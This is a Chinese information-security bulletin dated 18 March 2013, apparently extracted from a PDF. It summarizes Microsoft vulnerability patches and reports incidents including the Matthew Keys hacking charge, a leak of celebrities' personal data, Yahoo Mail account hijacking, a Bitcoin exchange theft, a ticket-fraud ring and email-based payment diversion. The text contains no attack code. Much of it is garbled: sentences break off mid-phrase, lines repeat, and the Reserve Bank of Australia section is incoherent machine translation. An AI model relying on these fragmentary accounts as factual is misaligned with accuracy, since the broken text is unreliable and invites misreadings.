Microsoft OneNote 2010 Service Pack 1 (64 位)
漏洞描述:
缓冲区大小检验漏洞 - CVE-2013-0086
Microsoft OneNote 解析特制的 OneNote (.ONE)文件时内存分配方式上存在信息泄露
漏洞。
6、MS13-026 - Office Outlook for Mac 信息泄露漏洞
此更新解决了 Microsoft Office for Mac 内 1 个秘密报告的漏洞。如果攻击者打开特制
的电子邮件,此漏洞可允许信息泄露。
受影响软件:
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
漏洞描述:
意外内容加载漏洞 - CVE-2013-0095
Microsoft Outlook for Mac 2008 和 Microsoft Outlook for Mac 2011 加载 HTML5 电子
邮件内特定的内容标签时存在信息泄露漏洞。
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
六、本期网络安全事件
路透社编辑被控与黑客合谋攻击洛杉矶时报网站
国际在线专稿:据澳大利亚《每日电讯报》3 月 15 日报道,美国联邦官员指控英国路
透社社交媒体编辑马修·基斯(Matthew Keys)与国际黑客组织“匿名者”合谋攻击美国
《洛杉矶时报》网站。
现年 26 岁的基斯曾是《洛杉矶时报》母公司论坛报业集团(Tribune Co.)一家分公
司的雇员,但后来被解雇。
美国联邦调查局(FBI)称,2012 年 12 月份,基斯将论坛报业集团计算机网络的登录
密码交给了“匿名者”成员,随后一名黑客侵入《洛杉矶时报》网站,篡改了 2010 年 12
月 14 日和 15 日发布的一篇新闻。基斯和另一名黑客后来还曾尝试侵入论坛报业集团的电
脑系统,但没有成功。
基斯被控与黑客合谋传送信息破坏受保护计算机等 3 项罪名。如果罪名成立,基斯最
路透社拒绝对此事发表评论。(沈姝华)
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
黑客攻击美 18 名政客名人信息泄露
美国“第一夫人”米歇尔和前国务卿希拉里·克林顿的个人私密信息被公布网站截图
据《新闻晚报》报道,最近,美国政府将网络攻击视为一个格外严重的问题,五角大楼
还宣布组建团队,欲亲自出手打击黑客。而黑客们神通广大无所不能的表现也充分证明了五
角大楼并没小题大作。
周二,美国司法部官员透露,联邦调查局(FBI)正在调查一个公布名人财务记录和个
人信息的网站,第一夫人米歇尔、副总统拜登和前国务卿希拉里等政治人物都遭到曝光,同
时,还有一些娱乐明星如歌手碧昂丝、Jay-Z 等也被曝光。
18 位名人私人信息被公布
的浏览量,目前仍可以浏览。
该网站列出了 18 位美国知名人士的社保号码、电话号码、地址和信用报告。除了米歇
市警察局局长贝克、演员库彻尔和施瓦辛格,还有大富豪特拉姆普。
人克莱称,公司已经在内部展开调查,被曝光的某些信息是从一个消费者信用报告的常用网
站上通过欺诈手段获得的。
瓦辛格、贝克和美国前副总统戈尔。
部分电话已被证实为假
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
据《华盛顿邮报》报道,这个网站地址使用的后缀“.su”表示,网站服务器很可能设
在俄罗斯境内或是其它前苏联国家境内。
司法部一名官员称,目前还不清楚该网站信息的真实度有多少,也不知道到底是谁发布
了这些信息。不过,其中一些电话号码已经被确认是不准确的。据称,公布的拜登的电话号
码已经被证明是特拉华州的一家商店,而所谓的演员库彻尔的电话号码实际上是纽约一家会
计公司的。
FBI 已经介入展开调查
司法部一位女发言人称,FBI 已经介入,正在调查此事究竟是一起身份信息盗窃案还是
黑客所为。
洛杉矶警局的女发言人费登表示洛杉矶警局也在着手追查,但名人们必须向警方提交报
告以便他们对该网站上的信息进行调查。现在还不知道有没有人提交了报告,不过费登说洛
杉矶市警察局长贝克被贴在该网站上的信息已经在进行调查之中。
Equifax 公司发言人克莱因称,公司初步调查显示,作案者的确持有某些人的个人信息,
因此能够通过身份验证的步骤。同时要取得财务和信用报告,作案者还必须持有抵押贷款、
汽车贷款或其他信用账户的信息。
作为美国三大信用监控公司之一,Equifax 表示他们正在努力修复信息泄漏问题,这涉
及到一些免费公共服务网站所使用的证书,顾客可以通过这些网站得到三大信用监控公司中
任何一家的报告。
雅虎用户称邮箱持续遭黑客攻击
3 月 11 日消息, 雅虎邮箱的用户发现自己的账户持续被黑客攻击。虽然雅虎表示,它已
经为至少两个独立的安全漏洞打上补丁。但用户账户被劫持的问题仍然存在。目前还不清楚
这些攻击已经持续多久。不仅雅虎个人用户发现自己的帐户遭到黑客攻击,谷歌同样发现来
自雅虎邮箱的异常流向。谷歌公司认为,这是因为黑客利用受到攻击的帐户发送垃圾邮件造
成的。
这种攻击的通常形式是雅虎邮箱的用户收到一封来自朋友或同事的邮件。这封邮件里面
包含一个链接,如果用户点击,则邮箱账户即被劫持。被劫持的邮箱则会有选择性的,或漫
无目的的发送垃圾邮件。近日来,雅虎已经出现一系列安全事件:
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
漏洞攻击雅虎邮箱帐户)
。
1 月 31 日,BitDefender 实验室指出,雅虎的开发博客中的上传组件具有安全隐患。
2 月开始便是,到目前为止一直持续的雅虎邮箱遭受攻击事件。
据。我们希望我们的用户经常更改自己的密码,在对每个在线网站选择密码时使用独特的字
母数字组合。
”
雅虎是在微软和谷歌之后,全球第三大电子邮件服务提供商。对于用户邮箱账户被劫持,
雅虎完全表现出一种消极的态度。作为雅虎邮箱的用户对于这种态度是完全不能接受的。
(秉
翰)
澳大利亚中央银行成为黑客的攻击目标
澳大利亚储备银行(RBA)不愿评论媒体报道说,在攻击中使用的恶意软件的计算机病
毒是起源于中国。 黑客的攻击已经成为政府和企业与常规,怀疑中国作为源远活动的。北
京一再否认它背后的攻击,说这是一个黑客的受害者,尤其是来自美国。 发布根据信息自
由法案
澳大利亚储备银行(RBA)不愿评论 媒体报道说,在攻击中使用的恶意软件的计算机
病毒是起源于中国。
背后的攻击,说这是一个黑客的受害者, 尤其是来自美国。
部帐户。
为是由服务器和删除 从网络于十一月十七日。
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
电子邮件,” 根据央行的事件报告。
电子邮件和自动拦截他们。
莓的,敏感的文件通过电子邮件发送出去 错误。
在驱动下,工作人员建议 一个路过的司机,报纸都散落在道路。
风险的银行”
,该报告显示。
依据特定算法,经由大量计算产生。与我们熟知的 QQ 币不同,比特币可以用来套现,兑
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
的 DNS 服务器,进而控制了邮件服务器,并经由对以上系统的控制成功登陆另一家比特币
Bitinstant 上周的一篇博客中对黑客进行了详细的描述,并强调“没有任何个人信息
和交易信息被泄露”。
Bitinstant 称,这位黑客的技术并不十分高明,但却非常狡猾,善于隐藏自己的行踪。
此前也曾有过几次盗窃失败的案例,作案者都是俄国人。结合这次的黑客选择的 hosting
服务器来看,怀疑此次的作案者身在俄国。
随着比特币开始流行,将来恐怕还将会有更大数额的盗窃案上演。
17 岁初中生自学成“黑客” 组团诈骗上百万
中新网嘉兴 3 月 12 日电:日,浙江嘉善警方成功侦破了一起特大网络机票诈骗案,涉案
多年的“黑客”生涯。
近年来,随着电子商务的兴起,网络诈骗陷阱也大量充斥其中,大量的代理商和中介让
人真假难辨,而其中的“黑色产业链”也催生了大量网络犯罪的产生。
1995 年出生的阿强是嘉善陶庄镇人,从小就被邻居们夸赞是个聪明孩子,尤其在电脑
方面,“没什么是他不懂的”。
一次偶然的机会,阿强接触到了“黑客”技术,并自此着了迷。
味。
经过数次“交易”,阿强渐渐摸清了圈子里一些“黑吃黑”的门道。有时他还与被攻击
对象串通,两头利益兼得。
积累了一定实战经验后,阿强便准备向利润巨大的网络诈骗下手。很快,他与一绰号为
了 20 余张银行卡和 6 张身份证,开通网银功能,通过所谓的“网络订售机票”来实施诈骗。
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
12 月初,网站初具规模,阿强开始招募人员。亲戚、同学、朋友都在他的选择之列,
万元。
法网恢恢,疏而不漏。2 月 21 日,嘉善警方经过长时间的布控,终于在当地两家洗浴
场所内将阿强等 5 名犯罪嫌疑人全部抓获。
据警方查证,阿强等人所经营的网站根本没有机票,其诈骗行为纯属空手套白狼。
“网站上挂出的机票信息大多是国内航线的打折票,价格在二三百元至一千多元不等。”
一名侦办民警告诉记者,因为折扣低,对消费者而言极具诱惑力,且会快速下单,并通过网
银将金额尽数打至犯罪分子事先准备好的账户。
说,他们正是抓住了一些客户急于出票、防范意识差的弱点,然后再以“保障客户银行卡内
资金不受损失”为由诱骗他们说出卡上余额,再以输入“激活码”、“验证码”等形式将受
害人卡里的钱全部划走。“这一招屡试不爽。”
诈骗罪被嘉善警方依法刑事拘留,其中一名犯罪嫌疑人被取保候审。此案仍在进一步审理中。
黑客入侵修改汇款银行台湾企业受害
台“刑事局国际刑警科”表示,去年 7 月接获民众报案,指公司计算机遭黑客入侵,
黑客进行破解后,取得公司电子邮件账号和密码,再进行篡改、变更公司汇款银行和账号,
已有多家公司受害。
警方说,台湾北部一间从事汽车零件出口贸易公司,收取汇款方式,是由美国客户以
电汇拨款至该公司在台账户,并透过电邮进行联系,确认收取帐款事宜。
今年 2 月底,该公司收到美国客户的电邮通知,即将汇出货款 50 万美元,数日后,受
害公司发现客户把货款改汇至另一个英国银行账户。
警方说,贸易公司向美国客户查证,美国客户称是依照台湾公司传来的电邮指示,受
害公司发现双方往来的电邮疑似遭黑客入侵。
黑客入侵电邮后,建构类似台湾受害公司的账号与美国客户进行联络,导致美国客户
陷入错误,把货款改汇至嫌疑人指定英国银行账户,因而遭受巨额金钱损失。(中国台湾
网 朱炼)
国盟信息安全研究小组主办 www.cncisa.com